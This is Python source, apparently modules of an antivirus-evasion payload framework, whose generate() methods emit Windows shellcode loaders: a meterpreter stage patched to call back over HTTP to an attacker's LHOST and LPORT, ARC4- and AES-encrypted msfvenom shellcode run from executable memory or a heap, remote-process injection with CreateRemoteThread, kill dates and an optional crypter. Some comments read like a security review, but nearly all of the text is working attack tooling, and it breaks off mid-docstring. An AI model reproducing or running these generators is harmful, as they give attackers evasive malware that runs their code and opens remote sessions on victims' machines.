        payloadCode += "\tif %s != None:\n" % (tempShellcodeName)
        payloadCode += "\t\t%s = bytearray(%s)\n" % (shellcodeBufName,
                                                     tempShellcodeName)
        # allocate enough virtual memory to stuff the .dll in
        # (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE; an
        # RWX private allocation is a common EDR/memory-scanner indicator).
        # NOTE(review): the returned pointer is handled as ctypes.c_int, which
        # truncates addresses above 4 GiB -- presumably this targets a 32-bit
        # interpreter; confirm before using on 64-bit Python.
        payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % (
            fpName, shellcodeBufName)
        # virtual lock to prevent the memory from paging out to disk
        payloadCode += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" % (
            fpName, shellcodeBufName)
        payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % (
            tempCBuffer, shellcodeBufName, shellcodeBufName)
        # copy the .dll into the allocated memory
        payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" % (
            fpName, tempCBuffer, shellcodeBufName)
        # kick the thread off to execute the .dll (start address = the buffer,
        # which begins with the mov edi, fd stub)
        payloadCode += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % (
            fpName)
        # wait for the .dll execution to finish (c_int(-1) is the INFINITE
        # timeout bit pattern)
        payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"

        # set up expiration options if specified
        if self.required_options["expire_payload"][0].lower() == "x":
            # download the stager
            payloadCode += "%s = %s()\n" % (shellCodeName, getDataMethodName)
            # inject what we grabbed
            payloadCode += "%s(%s)\n" % (injectMethodName, shellCodeName)
        else:
            # Get our current date (generation time) and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(
                days=int(self.required_options["expire_payload"][0])))

            randToday = helpers.randomString()
            randExpire = helpers.randomString()

            # imports placed after the function definitions are still valid
            # Python; they only need to precede the comparison below
            payloadCode += 'from datetime import datetime\n'
            payloadCode += 'from datetime import date\n\n'
            # local-clock check only: datetime.now() is naive local time
            payloadCode += randToday + ' = datetime.now()\n'
            # expiredate is 'YYYY-MM-DD'; [2:] drops the century to match "%y"
            payloadCode += randExpire + ' = datetime.strptime(\"' + expiredate[
                2:] + '\",\"%y-%m-%d\") \n'
            payloadCode += 'if ' + randToday + ' < ' + randExpire + ':\n'
            # download the stager
            payloadCode += "\t%s = %s()\n" % (shellCodeName, getDataMethodName)
            # inject what we grabbed
            payloadCode += "\t%s(%s)\n" % (injectMethodName, shellCodeName)

        # optional crypter pass over the whole generated source
        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode
    def generate(self) -> str:
        """Build the Python source for an HTTP meterpreter loader with the
        patched stage embedded inline.

        ``patch.headerPatch``, ``patch.patchTransport``, ``patch.patchURL`` and
        ``patch.patchUA`` (project helpers, not visible here) produce the
        patched meterpreter .dll; ``helpers.deflate`` compresses/encodes it and
        the result is embedded as a string literal in the emitted code. At run
        time that code inflates it with ``base64.b64decode`` +
        ``zlib.decompress(..., -15)`` (raw deflate) and executes it either by
        casting the bytes to a function pointer (``inject_method`` ==
        ``"void"``) or via VirtualAlloc/RtlMoveMemory/CreateThread (any other
        value).

        Options read from ``self.required_options`` (``[0]`` holds the value):
        ``LHOST``, ``LPORT``, ``inject_method`` and ``use_pyherion``.

        Returns:
            The generated source as a ``str`` (``encryption.pyherion`` output
            is presumed to be a ``str`` as well).

        Raises:
            KeyError: when one of the option keys above is missing.
        """

        # get the main meterpreter .dll with the header/loader patched
        meterpreterDll = patch.headerPatch()

        # turn off SSL (per the helper's second argument; the stage will talk
        # plain HTTP to the URL patched in below)
        meterpreterDll = patch.patchTransport(meterpreterDll, False)

        # replace the URL: http://LHOST:LPORT/<checksum>/ with an explicit NUL
        # so the patched C string is terminated. helpers.genHTTPChecksum()
        # presumably yields the URI checksum the handler expects -- not
        # verified here. LHOST/LPORT are used verbatim, no validation.
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
        meterpreterDll = patch.patchURL(meterpreterDll, urlString)

        # replace in the UA (NUL-terminated). A fixed, dated User-Agent like
        # this is a trivial network signature for defenders.
        meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")

        # compress/base64 encode the dll. The emitted code b64decodes and then
        # raw-inflates (wbits=-15), so deflate() must return base64 text of a
        # raw deflate stream; embedding it inside "..." relies on the base64
        # alphabet containing no quote or backslash characters.
        compressedDll = helpers.deflate(meterpreterDll)

        # actually build out the payload
        payloadCode = ""

        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()

            # deflate function (here randVarName names the helper's local)
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            # intentional rebind: a fresh name for the module-level result so
            # it differs from the helper's local above
            randVarName = helpers.randomString()
            randFuncName = helpers.randomString()

            payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
            # cast the inflated str's storage to a function pointer and call it
            # in place. NOTE(review): this executes out of the interpreter's
            # own object memory, so it presumably only works where that memory
            # is executable (no DEP) -- confirm on the target.
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName+"()\n"

        # VirtualAlloc() injection
        else:

            payloadCode += 'import ctypes,base64,zlib\n'

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()
            randPtr = helpers.randomString()
            randBuf = helpers.randomString()
            randHt = helpers.randomString()

            # deflate function. Unlike the "void" branch, randVarName is NOT
            # rebound afterwards: the helper's local and the module-level
            # variable share a name, which is legal (the local shadows).
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
            # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (an
            # RWX private allocation is a common EDR/memory-scanner indicator).
            # NOTE(review): pointers are carried in ctypes.c_int, which
            # truncates addresses above 4 GiB -- presumably a 32-bit
            # interpreter is assumed; confirm before use on 64-bit Python.
            payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
            # copy the inflated .dll into the RWX region
            payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
            # run it on a new thread and block until it returns
            # (c_int(-1) is the INFINITE timeout bit pattern)
            payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'

        # optional crypter pass over the whole generated source
        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode
    def generate(self):
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandARCKey = helpers.randomString()
                RandARCPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)

                PayloadCode = 'from Crypto.Cipher import ARC4\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
                PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                    "string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
                PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandARCKey = helpers.randomString()
                RandARCPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)

                PayloadCode = 'from Crypto.Cipher import ARC4\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
                PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                    "string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
                PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandARCKey = helpers.randomString()
                RandARCPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                HeapVar = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)

                PayloadCode = 'from Crypto.Cipher import ARC4\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
                PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                    "string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
                PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandARCKey = helpers.randomString()
                RandARCPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                HeapVar = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)

                PayloadCode = 'from Crypto.Cipher import ARC4\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
                PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                    "string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
                PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        else:
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandARCKey = helpers.randomString()
                RandARCPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)

                PayloadCode = 'from Crypto.Cipher import ARC4\n'
                PayloadCode += 'from ctypes import *\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
                PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                    "string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
                PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandARCKey = helpers.randomString()
                RandARCPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)

                PayloadCode = 'from Crypto.Cipher import ARC4\n'
                PayloadCode += 'from ctypes import *\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
                PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
                PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                    "string_escape") + '\'\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
                PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += '\t' + RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
    def generate(self):
            """Build the Python source of a remote-process shellcode injector.

            Returns the generated payload as a str.  The emitted script (ctypes,
            presumably Python 2 like the rest of this file - confirm) opens the
            process named by the PID_NUMBER option, allocates an RWX region in it
            with VirtualAllocEx, copies the msfvenom shellcode there with
            WriteProcessMemory and starts it with CreateRemoteThread.

            Options read from self.required_options:
              EXPIRE_PAYLOAD  "x" -> no kill date.  Otherwise an integer number of
                              days from today; the emitted script only injects
                              while datetime.now() on the target is before that
                              date.  int() raises ValueError for any other value.
              PID_NUMBER      target process id.  It is pasted verbatim into the
                              generated source and is NOT validated here, so a
                              non-numeric value yields a broken (or arbitrary)
                              payload script - operator-controlled, but worth an
                              int() check upstream.
              USE_PYHERION    "y" -> wrap the result with encryption.pyherion().

            Security notes for reviewers:
              * The kill date is a client-side wall-clock comparison against a
                hard-coded date; the shellcode is still present in the file and
                the check is defeated by moving the clock back.  Treat it as an
                engagement safety net, not a control.
              * The shellcode is embedded as a plain "..." literal with no
                encoding; this assumes the msfvenom text contains no unescaped
                double quotes or raw newlines - TODO confirm against
                self.shellcode.generate().
              * The emitted script never checks the return values of OpenProcess,
                VirtualAllocEx, WriteProcessMemory or CreateRemoteThread and never
                closes the process handle.
            """
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom (note: this module passes the
                # option dict through, unlike the sibling generators in this file)
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names for the emitted script
                ShellcodeVariableName = helpers.randomString()
                pid_num_variable = helpers.randomString()
                pagerwx_variable = helpers.randomString()
                processall_variable = helpers.randomString()
                memcommit_variable = helpers.randomString()
                shell_length_variable = helpers.randomString()
                memalloc_variable = helpers.randomString()
                prochandle_variable = helpers.randomString()
                kernel32_variable = helpers.randomString()

                # Create Payload code.  Standard Win32 constants:
                #   0x40       PAGE_EXECUTE_READWRITE
                #   0x1F0FFF   PROCESS_ALL_ACCESS
                #   0x1000     MEM_COMMIT
                PayloadCode = 'from ctypes import *\n\n'
                PayloadCode += pagerwx_variable + ' = 0x40\n'
                PayloadCode += processall_variable + ' = 0x1F0FFF\n'
                PayloadCode += memcommit_variable + ' = 0x00001000\n'
                PayloadCode += kernel32_variable + ' = windll.kernel32\n'
                # shellcode goes in as a raw double-quoted literal (no escaping)
                PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
                # PID_NUMBER is interpolated unvalidated - see docstring
                PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
                PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
                # open -> allocate RWX -> write -> start thread; no return checks, no CloseHandle
                PayloadCode += prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
                PayloadCode += memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
                PayloadCode += kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
                PayloadCode += kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date.
                # str(date) is 'YYYY-MM-DD'; [2:] below drops the century so it
                # matches the '%y-%m-%d' format the emitted strptime uses.
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names for the emitted script
                ShellcodeVariableName = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                pid_num_variable = helpers.randomString()
                pagerwx_variable = helpers.randomString()
                processall_variable = helpers.randomString()
                memcommit_variable = helpers.randomString()
                shell_length_variable = helpers.randomString()
                memalloc_variable = helpers.randomString()
                prochandle_variable = helpers.randomString()
                kernel32_variable = helpers.randomString()

                # Create Payload code (same constants as the non-expiring branch)
                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                # kill-date check: local wall clock vs. hard-coded date (bypassable)
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += pagerwx_variable + ' = 0x40\n'
                PayloadCode += processall_variable + ' = 0x1F0FFF\n'
                PayloadCode += memcommit_variable + ' = 0x00001000\n'
                PayloadCode += kernel32_variable + ' = windll.kernel32\n'
                # shellcode and PID are still emitted unconditionally; only the
                # injection itself sits under the date check
                PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
                PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
                PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
                PayloadCode += '\t' + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
                PayloadCode += '\t' + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
                PayloadCode += '\t' + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
    def generate(self):
        """Build the Python source of a Windows shellcode runner with AES-wrapped shellcode.

        Returns the generated payload as a str.  Two options read from
        self.required_options select the shape of the emitted script:

          inject_method   "virtual" -> VirtualAlloc(RWX) + RtlMoveMemory + CreateThread
                          "heap"    -> HeapCreate(executable) + HeapAlloc + RtlMoveMemory
                                       + CreateThread
                          anything else -> create_string_buffer + cast(..., CFUNCTYPE)()
                          (the first two branches return, so the trailing else is
                          reached only for values that are neither)
          expire_payload  "x" -> run unconditionally.  Otherwise an integer number
                          of days from today; the emitted script only runs while
                          datetime.now() on the target is before that date.  int()
                          raises ValueError for any other value.
          use_pyherion    "y" -> post-process the result with encryption.pyherion().

        The msfvenom shellcode is passed through encryption.encryptAES(); the
        emitted script embeds the key (secret) next to the base64 ciphertext and
        decrypts at run time, rstrip()ping the '{' padding afterwards.  Because the
        key ships with the ciphertext this only defeats static signatures - it is
        obfuscation, not confidentiality.

        Reviewer notes:
          * The kill date is a client-side wall-clock comparison against a
            hard-coded date; the shellcode stays in the file and the check is
            bypassed by moving the clock back.  An engagement safety net, not a
            control.
          * secret and EncodedShellcode are pasted between single quotes with no
            escaping.  Base64 output is safe; the key format is not visible here -
